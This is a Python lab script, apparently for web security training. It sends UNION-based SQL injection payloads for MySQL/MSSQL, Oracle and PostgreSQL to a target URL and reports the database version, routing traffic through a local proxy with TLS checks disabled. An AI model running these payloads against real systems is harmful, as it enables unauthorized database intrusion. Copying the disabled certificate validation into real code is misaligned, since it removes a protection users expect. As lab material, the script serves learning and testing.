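"""Lab script: probe a UNION-based SQL injection point for a database version string.

Usage: script.py <url> <path>

Every request is routed through a local intercepting proxy (see PROXIES) and
TLS certificate validation is switched off so that the proxy can re-sign
traffic. Responses are therefore not authenticated by TLS.
"""

import re
import sys

import requests
import urllib3
from bs4 import BeautifulSoup

# verify=False is used below; this silences the warning urllib3 would
# otherwise print on every unverified HTTPS request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Proxy settings for debugging. Both schemes go through 127.0.0.1:8080; if
# nothing is listening there, each request fails with a RequestException and
# is reported as "[-] Request failed".
PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# Seconds to wait for the server (or the proxy) before giving up. Without a
# timeout, requests.get() can block forever on an unresponsive endpoint.
REQUEST_TIMEOUT = 10

# Loose "x.y.z" matcher (one or two digits per component), compiled once.
VERSION_PATTERN = re.compile(r"\d{1,2}\.\d{1,2}\.\d{1,2}")


def test_payload(url, path, payload):
    """Request ``url + path + payload`` and return the first version-like text.

    Args:
        url: Base URL of the target, e.g. ``http://www.example.com``.
        path: Path and query prefix the payload is appended to.
        payload: String appended verbatim to the query.

    Returns:
        The stripped text of the first HTML text node matching
        ``VERSION_PATTERN``, or ``None`` if the request failed, returned an
        HTTP error status, or no text node matched.

    Note:
        A match only means the page contained something shaped like
        ``x.y.z``. Any unrelated version-looking text in the page satisfies
        the pattern, so a non-None result should be checked by hand.
    """
    target = f"{url}{path}{payload}"
    try:
        response = requests.get(
            target,
            verify=False,
            proxies=PROXIES,
            timeout=REQUEST_TIMEOUT,
        )
        response.raise_for_status()  # Raise an exception for HTTP errors
    except requests.RequestException as error:
        print(f"[-] Request failed: {error}")
        return None

    soup = BeautifulSoup(response.text, "html.parser")
    # string= is the current keyword; the older text= argument is deprecated.
    match = soup.find(string=VERSION_PATTERN)
    if not match:
        return None
    return match.strip()


def exploit_sqli_version(url, path):
    """Try each DBMS-specific payload in turn and report the first version found.

    Args:
        url: Base URL of the target.
        path: Path and query prefix the payload is appended to.

    Returns:
        ``True`` as soon as one payload's response yields a version-like
        string (remaining payloads are not tried), otherwise ``False``.
    """
    payloads = {
        "Microsoft, MySQL": "' UNION SELECT @@version, NULL%23",
        "Oracle": "' UNION SELECT * FROM v$version--",
        "PostgreSQL": "' UNION SELECT version(), NULL--",
    }

    for dbms, payload in payloads.items():
        print(f"[+] Testing payload for {dbms}...")
        version = test_payload(url, path, payload)
        if not version:
            continue
        # The DBMS label is simply the payload that was in flight when a
        # version-like string appeared; it is not independently confirmed.
        print(f"[+] The database version is: {version} (DBMS: {dbms})")
        return True

    print("[-] No version information found with any payload.")
    return False


if __name__ == "__main__":
    if len(sys.argv) != 3:
        # The usage line previously printed no argument names at all.
        print(f"[-] Usage: {sys.argv[0]} <url> <path>")
        print(
            f"[-] Example: {sys.argv[0]} http://www.example.com /filter?category=Accessories"
        )
        sys.exit(-1)

    url, path = sys.argv[1].strip(), sys.argv[2].strip()
    print("[+] Dumping the version of the database...")

    if not exploit_sqli_version(url, path):
        print("[-] Unable to dump the database version.")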